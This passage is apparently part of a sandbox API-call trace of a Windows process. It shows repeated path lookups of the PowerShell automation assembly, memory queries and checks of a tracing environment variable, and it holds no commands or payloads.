lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.504] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.513] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.513] CoTaskMemFree (pv=0x2af480) [0125.522] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.549] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.549] CoTaskMemFree (pv=0x2af480) [0125.551] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.551] CoTaskMemFree (pv=0x2af480) [0125.554] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.554] CoTaskMemFree (pv=0x2af480) [0125.586] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.586] CoTaskMemFree (pv=0x2af480) [0125.590] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.591] CoTaskMemFree (pv=0x2af480) [0125.591] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.592] CoTaskMemFree (pv=0x2af480) [0125.607] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.615] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.842] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.863] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.863] CoTaskMemFree (pv=0x2af480) [0126.187] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2af590 [0126.191] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2af6a0 [0126.617] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.738] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.741] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.742] VirtualQuery (in: lpAddress=0x10a220, lpBuffer=0x10b0e0, dwLength=0x30 | out: lpBuffer=0x10b0e0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: lpAddress=0x10b7d0, lpBuffer=0x10c690, dwLength=0x30 | out: lpBuffer=0x10c690*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0126.871] VirtualQuery (in: 